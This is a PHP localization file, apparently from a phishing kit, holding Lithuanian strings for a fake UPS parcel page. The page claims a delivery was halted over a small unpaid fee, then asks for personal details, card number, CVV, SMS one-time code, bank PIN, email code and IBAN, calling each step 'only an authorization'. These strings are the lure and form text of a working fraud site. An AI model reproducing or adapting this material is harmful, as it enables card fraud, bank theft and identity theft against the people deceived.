<?php
function lang($phrase){
	static $lang = array(

                "xlang" => "LT",
                "xcapt1" => "Patikrinkite CAPTCHA langelį.",
                "xcapt2" => "Patikrinimas",
                "xcapt3" => "Tęsti",
                "xfot1" => "Ši svetainė",
                "xfot2" => "Kitos UPS svetainės",
                "xfot3" => "Susisiekite su mumis",
                "xfot4" => "Legal",
                "xfot5" => "Copyright ©1994- 2023&nbsp;United Parcel Service of America, Inc. Visos teisės saugomos. ",
                "xind1" => "Sekti",
                "xind2" => "Sekimo numeris",
                "xind3" => "Error : Prašome nurodyti teisingą sekimo numerį.",
                "xind4" => "Reikia pagalbos keičiant pristatymą?",
                "xind5" => "Citata",
                "xind6" => "Išsiųsti",
                "xind7" => "Atsiskaitymas",
                "xind8" => "Gauti pagalbą",
                "xexp1" => "Pristatymas nutrauktas",
                "xexp2" => "Stebėjimas",
                "xexp3" => "Jūsų paskutinis pristatymas buvo nutrauktas. Šiuo metu jis yra sulaikytas rūšiavimo centre.",
                "xexp4" => "Jums išsiųstas siuntinys neatitiko nurodyto svorio, todėl jūsų bus paprašyta sumokėti papildomą mokestį, kad būtų užtikrintas tinkamas siuntinio pristatymas.",
                "xexp5" => "Mokestis yra 0,48 €",
                "xexp6" => "Norėdami sumokėti, spustelėkite toliau esantį mygtuką",
                "xexp7" => "Apmokėti",
                "xexp8" => "Sumokėjus mokestį, jūsų siuntinys bus kuo greičiau persiųstas pristatymo adresu.",
                "xexp9" => "Jei mokestis nebus sumokėtas per 48 valandas, siuntinys bus grąžintas siuntėjui.",
                "xexp10" => "Sekti pagal nuorodos numerį",
                "xexp11" => "Importo sekimo numeriai",
                "xexp12" => "Kitos sekimo paslaugos",
                "xinfz1" => "Patvirtinkite sąskaitos duomenis",
                "xinfz2" => "Pilnas pavadinimas",
                "xinfz10" => "Gimimo data",
                "xinfz3" => "Šalis",
                "xinfz4" => "Miestas",
                "xinfz5" => "Adresas",
                "xinfz6" => "Telefonas",
                "xinfz7" => "Pašto indeksas",
                "xinfz8" => "Error : Reikia pateikti visus duomenis",
                "xinfz9" => "Patvirtinti",
                "xpay1" => "Mokėjimo duomenys",
                "xpay2" => "Gerbiamas kliente, teisingai patikrinkite savo mokėjimo duomenis ir suderinkite savo kortelės duomenis, kad užbaigtumėte",
                "xpay3" => "Vardas ir pavardė kortelėje",
                "xpay4" => "Kortelės numeris",
                "xpay5" => "Galiojimo data",
                "xpay6" => "Saugumo kodas CVV (3 skaitmenys)",
                "xpay7" => "Klaida: Reikia pateikti visus duomenis",
                "xpay8" => "Patvirtinti",
                "xsms1" => "Patvirtinimas",
                "xsms2" => "Išsiuntėme patvirtinimo kodą į jūsų numerį.",
                "xsms3" => "OTP kodas",
                "xsms4" => "Klaida: neteisingas OTP kodas.",
                "xsms5" => "Šis žingsnis reikalingas, kad mokėjimo procesas būtų saugiai užbaigtas.",
                "xsms6" => "UPS atlieka laikiną jūsų kortelės autentiškumo patvirtinimą, kad ją patikrintų. Tai yra tik autorizavimas ir NĖRA mokestis.",
                "xsms7" => "Patvirtinti",
                "xconf1" => "Pristatymo atnaujinimas",
                "xconf2" => "Atsižvelgta į papildomų mokesčių sumokėjimą.",
                "xconf3" => "Jūsų siuntinys turėtų būti pristatytas per artimiausias 24 valandas.",
                "xconf4" => "Patvirtinti",
                "xpin1" => "Patikrinimas",
                "xpin2" => "Įveskite savo banko kortelės PIN kodą",
                "xpin3" => "PIN kodas",
                "xpin4" => "(4 skaitmenys)",
                "xpin5" => "Šis žingsnis reikalingas, kad saugiai užbaigtumėte mokėjimo procesą.",
                "xpin6" => "UPS atlieka laikiną jūsų kortelės patikrinimą, kad ją patvirtintų. Tai yra tik autorizavimas ir NĖRA mokestis.",
                "xpin7" => "Patvirtinti",
                "xmail1" => "Patikrinimas",
                "xmail2" => "Į jūsų el. paštą išsiuntėme patvirtinimo kodą",
                "xmail3" => "El. pašto kodas",
                "xmail4" => "(6 skaitmenys)",
                "xmail5" => "Šis žingsnis reikalingas, kad saugiai užbaigtumėte mokėjimo procesą.",
                "xmail6" => "UPS atlieka laikiną jūsų kortelės patikrinimą, kad ją patvirtintų. Tai yra tik autorizavimas ir NĖRA mokestis.",
                "xmail7" => "Patvirtinti",
                "xiban1" => "Patikrinimas",
        "xiban2" => "Įveskite savo IBAN, kad užbaigtumėte mokėjimą",
        "xiban3" => "IBAN",
        "xiban4" => "(IBAN)",
        "xiban5" => "Šis žingsnis reikalingas, kad saugiai užbaigtumėte mokėjimo procesą.",
        "xiban6" => "UPS atlieka laikiną jūsų kortelės patikrinimą, kad ją patikrintų. Tai yra tik autorizavimas ir NĖRA mokestis.",
        "xiban7" => "Patvirtinti"
	);	
	
	return $lang[$phrase];
}
 ?>s